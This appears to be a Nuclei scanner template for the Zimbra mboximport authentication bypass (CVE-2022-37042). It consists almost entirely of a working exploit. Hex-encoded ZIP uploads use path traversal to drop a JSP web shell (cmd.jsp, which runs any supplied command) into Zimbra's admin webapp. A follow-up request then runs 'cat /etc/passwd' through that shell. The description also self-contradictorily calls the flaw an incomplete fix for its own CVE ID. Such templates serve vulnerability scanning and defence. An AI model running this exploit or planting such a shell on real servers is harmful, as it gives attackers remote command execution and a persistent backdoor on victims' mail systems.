id: CVE-2022-37042
info:

name: Zimbra - Authentication Bypass
author: For3stCo1d
severity: critical
description: |
Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-37042.
reference:
- https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability
metadata:
shodan-query: http.favicon.hash:"1624375939"
tags: cve,cve2022,zimbra,auth-bypass,rce

requests:
- raw:
- |
POST /service/extension/backup/mboximport?account-name=valid@example.com&account-status=1&ow=cmd HTTP/1.1
Host: {{Hostname}}
content-type: application/x-www-form-urlencode
{{hex_decode('0D0A0D0A504B030414000000000006030D5582B02AC73D0300003D030000300000002E2E2F2E2E2F2E2E2F2E2E2F6D61696C626F78642F776562617070732F7A696D62726141646D696E2F636D642E6A73703C2540207061676520696D706F72743D226A6176612E7574696C2E2A2C6A6176612E696F2E2A22253E0A3C250A2F2F0A2F2F204A53505F4B49540A2F2F0A2F2F20636D642E6A7370203D20436F6D6D616E6420457865637574696F6E2028756E6978290A2F2F0A2F2F2062793A20556E6B6E6F776E0A2F2F206D6F6469666965643A2032372F30362F323030330A2F2F0A253E0A3C48544D4C3E3C424F44593E0A3C464F524D204D4554484F443D2247455422204E414D453D226D79666F726D2220414354494F4E3D22223E0A3C494E50555420545950453D227465787422204E414D453D22636D64223E0A3C494E50555420545950453D227375626D6974222056414C55453D2253656E64223E0A3C2F464F524D3E0A3C7072653E0A3C250A69662028726571756573742E676574506172616D657465722822636D64222920213D206E756C6C29207B0A20202020202020206F75742E7072696E746C6E2822436F6D6D616E643A2022202B20726571756573742E676574506172616D657465722822636D642229202B20223C42523E22293B0A202020202020202050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328726571756573742E676574506172616D657465722822636D642229293B0A20202020202020204F757470757453747265616D206F73203D20702E6765744F757470757453747265616D28293B0A2020202020202020496E70757453747265616D20696E203D20702E676574496E70757453747265616D28293B0A202020202020202044617461496E70757453747265616D20646973203D206E65772044617461496E70757453747265616D28696E293B0A2020202020202020537472696E672064697372203D206469732E726561644C696E6528293B0A20202020202020207768696C652028206469737220213D206E756C6C2029207B0A202020202020202020202020202020206F75742E7072696E746C6E2864697372293B200A2020202020202020202020202020202064697372203D206469732E726561644C696E6528293B200A202020202020202020202020202020207D0A20202020202020207D0A253E0A3C2F7072653E0A3C2F424F44593E3C2F48544D4C3E0A0A0A504B030414000000000006030D5582B02AC73D0300003D030000300000002E2E2F2E2E2F2E2E2F2E2E2F6D61696C626F78642F776562617070732F7A696D62726141646D696E2F636D642E6A73703C2540207061676520696D706F72743D226A6176612E7574696C2E2A2C6A6176612E696F2E2A22253E0A3C250A2F2F0A2F2F204A53505F4B49540A2F2F0A2F2F20636D642E6A7370203D20436F6D6D616E6420457865637574696F6E2028756E6978290A2F2F0A2F2F2062793A20556E6B6E6F776E0A2F2F206D6F6469666965643A2032372F30362F323030330A2F2F0A253E0A3C48544D4C3E3C424F44593E0A3C464F524D204D4554484F443D2247455422204E414D453D226D79666F726D2220414354494F4E3D22223E0A3C494E50555420545950453D227465787422204E414D453D22636D64223E0A3C494E50555420545950453D227375626D6974222056414C55453D2253656E64223E0A3C2F464F524D3E0A3C7072653E0A3C250A69662028726571756573742E676574506172616D657465722822636D64222920213D206E756C6C29207B0A20202020202020206F75742E7072696E746C6E2822436F6D6D616E643A2022202B20726571756573742E676574506172616D657465722822636D642229202B20223C42523E22293B0A202020202020202050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328726571756573742E676574506172616D657465722822636D642229293B0A20202020202020204F757470757453747265616D206F73203D20702E6765744F757470757453747265616D28293B0A2020202020202020496E70757453747265616D20696E203D20702E676574496E70757453747265616D28293B0A202020202020202044617461496E70757453747265616D20646973203D206E65772044617461496E70757453747265616D28696E293B0A2020202020202020537472696E672064697372203D206469732E726561644C696E6528293B0A20202020202020207768696C652028206469737220213D206E756C6C2029207B0A202020202020202020202020202020206F75742E7072696E746C6E2864697372293B200A2020202020202020202020202020202064697372203D206469732E726561644C696E6528293B200A202020202020202020202020202020207D0A20202020202020207D0A253E0A3C2F7072653E0A3C2F424F44593E3C2F48544D4C3E0A0A0A504B0102140314000000000006030D5582B02AC73D0300003D030000300000000000000000000000FF81000000002E2E2F2E2E2F2E2E2F2E2E2F6D61696C626F78642F776562617070732F7A696D62726141646D696E2F636D642E6A7370504B0102140314000000000006030D5582B02AC73D0300003D030000300000000000000000000000FF818B0300002E2E2F2E2E2F2E2E2F2E2E2F6D61696C626F78642F776562617070732F7A696D62726141646D696E2F636D642E6A7370504B05060000000002000200BC000000160700000000')}}
- |
POST /service/extension/backup/mboximport?account-name=valid@example.com&account-status=1&ow=cmd HTTP/1.1
Host: {{Hostname}}
content-type: application/x-www-form-urlencode
{{hex_decode('0D0A0D0A504B030414000000000006030D5582B02AC73D0300003D030000320000002E2E2F2E2E2F2E2E2F2E2E2F6A657474795F626173652F776562617070732F7A696D62726141646D696E2F636D642E6A73703C2540207061676520696D706F72743D226A6176612E7574696C2E2A2C6A6176612E696F2E2A22253E0A3C250A2F2F0A2F2F204A53505F4B49540A2F2F0A2F2F20636D642E6A7370203D20436F6D6D616E6420457865637574696F6E2028756E6978290A2F2F0A2F2F2062793A20556E6B6E6F776E0A2F2F206D6F6469666965643A2032372F30362F323030330A2F2F0A253E0A3C48544D4C3E3C424F44593E0A3C464F524D204D4554484F443D2247455422204E414D453D226D79666F726D2220414354494F4E3D22223E0A3C494E50555420545950453D227465787422204E414D453D22636D64223E0A3C494E50555420545950453D227375626D6974222056414C55453D2253656E64223E0A3C2F464F524D3E0A3C7072653E0A3C250A69662028726571756573742E676574506172616D657465722822636D64222920213D206E756C6C29207B0A20202020202020206F75742E7072696E746C6E2822436F6D6D616E643A2022202B20726571756573742E676574506172616D657465722822636D642229202B20223C42523E22293B0A202020202020202050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328726571756573742E676574506172616D657465722822636D642229293B0A20202020202020204F757470757453747265616D206F73203D20702E6765744F757470757453747265616D28293B0A2020202020202020496E70757453747265616D20696E203D20702E676574496E70757453747265616D28293B0A202020202020202044617461496E70757453747265616D20646973203D206E65772044617461496E70757453747265616D28696E293B0A2020202020202020537472696E672064697372203D206469732E726561644C696E6528293B0A20202020202020207768696C652028206469737220213D206E756C6C2029207B0A202020202020202020202020202020206F75742E7072696E746C6E2864697372293B200A2020202020202020202020202020202064697372203D206469732E726561644C696E6528293B200A202020202020202020202020202020207D0A20202020202020207D0A253E0A3C2F7072653E0A3C2F424F44593E3C2F48544D4C3E0A0A0A504B030414000000000006030D5582B02AC73D0300003D030000320000002E2E2F2E2E2F2E2E2F2E2E2F6A657474795F626173652F776562617070732F7A696D62726141646D696E2F636D642E6A73703C2540207061676520696D706F72743D226A6176612E7574696C2E2A2C6A6176612E696F2E2A22253E0A3C250A2F2F0A2F2F204A53505F4B49540A2F2F0A2F2F20636D642E6A7370203D20436F6D6D616E6420457865637574696F6E2028756E6978290A2F2F0A2F2F2062793A20556E6B6E6F776E0A2F2F206D6F6469666965643A2032372F30362F323030330A2F2F0A253E0A3C48544D4C3E3C424F44593E0A3C464F524D204D4554484F443D2247455422204E414D453D226D79666F726D2220414354494F4E3D22223E0A3C494E50555420545950453D227465787422204E414D453D22636D64223E0A3C494E50555420545950453D227375626D6974222056414C55453D2253656E64223E0A3C2F464F524D3E0A3C7072653E0A3C250A69662028726571756573742E676574506172616D657465722822636D64222920213D206E756C6C29207B0A20202020202020206F75742E7072696E746C6E2822436F6D6D616E643A2022202B20726571756573742E676574506172616D657465722822636D642229202B20223C42523E22293B0A202020202020202050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328726571756573742E676574506172616D657465722822636D642229293B0A20202020202020204F757470757453747265616D206F73203D20702E6765744F757470757453747265616D28293B0A2020202020202020496E70757453747265616D20696E203D20702E676574496E70757453747265616D28293B0A202020202020202044617461496E70757453747265616D20646973203D206E65772044617461496E70757453747265616D28696E293B0A2020202020202020537472696E672064697372203D206469732E726561644C696E6528293B0A20202020202020207768696C652028206469737220213D206E756C6C2029207B0A202020202020202020202020202020206F75742E7072696E746C6E2864697372293B200A2020202020202020202020202020202064697372203D206469732E726561644C696E6528293B200A202020202020202020202020202020207D0A20202020202020207D0A253E0A3C2F7072653E0A3C2F424F44593E3C2F48544D4C3E0A0A0A504B0102140314000000000006030D5582B02AC73D0300003D030000320000000000000000000000FF81000000002E2E2F2E2E2F2E2E2F2E2E2F6A657474795F626173652F776562617070732F7A696D62726141646D696E2F636D642E6A7370504B0102140314000000000006030D5582B02AC73D0300003D030000320000000000000000000000FF818D0300002E2E2F2E2E2F2E2E2F2E2E2F6A657474795F626173652F776562617070732F7A696D62726141646D696E2F636D642E6A7370504B05060000000002000200C00000001A0700000000')}}
- |
POST /service/extension/backup/mboximport?account-name=valid@example.com&account-status=1&ow=cmd HTTP/1.1
Host: {{Hostname}}
content-type: application/x-www-form-urlencode
{{hex_decode('0D0A0D0A504B030414000000000056000D5553FC516702000000020000002D0000002E2E2F2E2E2F2E2E2F2E2E2F6A657474792F776562617070732F7A696D62726141646D696E2F706F632E6A7370310A504B030414000000000006030D5582B02AC73D0300003D0300002D0000002E2E2F2E2E2F2E2E2F2E2E2F6A657474792F776562617070732F7A696D62726141646D696E2F636D642E6A73703C2540207061676520696D706F72743D226A6176612E7574696C2E2A2C6A6176612E696F2E2A22253E0A3C250A2F2F0A2F2F204A53505F4B49540A2F2F0A2F2F20636D642E6A7370203D20436F6D6D616E6420457865637574696F6E2028756E6978290A2F2F0A2F2F2062793A20556E6B6E6F776E0A2F2F206D6F6469666965643A2032372F30362F323030330A2F2F0A253E0A3C48544D4C3E3C424F44593E0A3C464F524D204D4554484F443D2247455422204E414D453D226D79666F726D2220414354494F4E3D22223E0A3C494E50555420545950453D227465787422204E414D453D22636D64223E0A3C494E50555420545950453D227375626D6974222056414C55453D2253656E64223E0A3C2F464F524D3E0A3C7072653E0A3C250A69662028726571756573742E676574506172616D657465722822636D64222920213D206E756C6C29207B0A20202020202020206F75742E7072696E746C6E2822436F6D6D616E643A2022202B20726571756573742E676574506172616D657465722822636D642229202B20223C42523E22293B0A202020202020202050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328726571756573742E676574506172616D657465722822636D642229293B0A20202020202020204F757470757453747265616D206F73203D20702E6765744F757470757453747265616D28293B0A2020202020202020496E70757453747265616D20696E203D20702E676574496E70757453747265616D28293B0A202020202020202044617461496E70757453747265616D20646973203D206E65772044617461496E70757453747265616D28696E293B0A2020202020202020537472696E672064697372203D206469732E726561644C696E6528293B0A20202020202020207768696C652028206469737220213D206E756C6C2029207B0A202020202020202020202020202020206F75742E7072696E746C6E2864697372293B200A2020202020202020202020202020202064697372203D206469732E726561644C696E6528293B200A202020202020202020202020202020207D0A20202020202020207D0A253E0A3C2F7072653E0A3C2F424F44593E3C2F48544D4C3E0A0A0A504B030414000000000006030D5582B02AC73D0300003D0300002D0000002E2E2F2E2E2F2E2E2F2E2E2F6A657474792F776562617070732F7A696D62726141646D696E2F636D642E6A73703C2540207061676520696D706F72743D226A6176612E7574696C2E2A2C6A6176612E696F2E2A22253E0A3C250A2F2F0A2F2F204A53505F4B49540A2F2F0A2F2F20636D642E6A7370203D20436F6D6D616E6420457865637574696F6E2028756E6978290A2F2F0A2F2F2062793A20556E6B6E6F776E0A2F2F206D6F6469666965643A2032372F30362F323030330A2F2F0A253E0A3C48544D4C3E3C424F44593E0A3C464F524D204D4554484F443D2247455422204E414D453D226D79666F726D2220414354494F4E3D22223E0A3C494E50555420545950453D227465787422204E414D453D22636D64223E0A3C494E50555420545950453D227375626D6974222056414C55453D2253656E64223E0A3C2F464F524D3E0A3C7072653E0A3C250A69662028726571756573742E676574506172616D657465722822636D64222920213D206E756C6C29207B0A20202020202020206F75742E7072696E746C6E2822436F6D6D616E643A2022202B20726571756573742E676574506172616D657465722822636D642229202B20223C42523E22293B0A202020202020202050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328726571756573742E676574506172616D657465722822636D642229293B0A20202020202020204F757470757453747265616D206F73203D20702E6765744F757470757453747265616D28293B0A2020202020202020496E70757453747265616D20696E203D20702E676574496E70757453747265616D28293B0A202020202020202044617461496E70757453747265616D20646973203D206E65772044617461496E70757453747265616D28696E293B0A2020202020202020537472696E672064697372203D206469732E726561644C696E6528293B0A20202020202020207768696C652028206469737220213D206E756C6C2029207B0A202020202020202020202020202020206F75742E7072696E746C6E2864697372293B200A2020202020202020202020202020202064697372203D206469732E726561644C696E6528293B200A202020202020202020202020202020207D0A20202020202020207D0A253E0A3C2F7072653E0A3C2F424F44593E3C2F48544D4C3E0A0A0A504B0102140314000000000056000D5553FC516702000000020000002D0000000000000000000000FF81000000002E2E2F2E2E2F2E2E2F2E2E2F6A657474792F776562617070732F7A696D62726141646D696E2F706F632E6A7370504B0102140314000000000006030D5582B02AC73D0300003D0300002D0000000000000000000000FF814D0000002E2E2F2E2E2F2E2E2F2E2E2F6A657474792F776562617070732F7A696D62726141646D696E2F636D642E6A7370504B0102140314000000000006030D5582B02AC73D0300003D0300002D0000000000000000000000FF81D50300002E2E2F2E2E2F2E2E2F2E2E2F6A657474792F776562617070732F7A696D62726141646D696E2F636D642E6A7370504B')}}


- |
GET /zimbraAdmin/cmd.jsp?cmd=cat+/etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
condition: and

- type: status
status:
- 200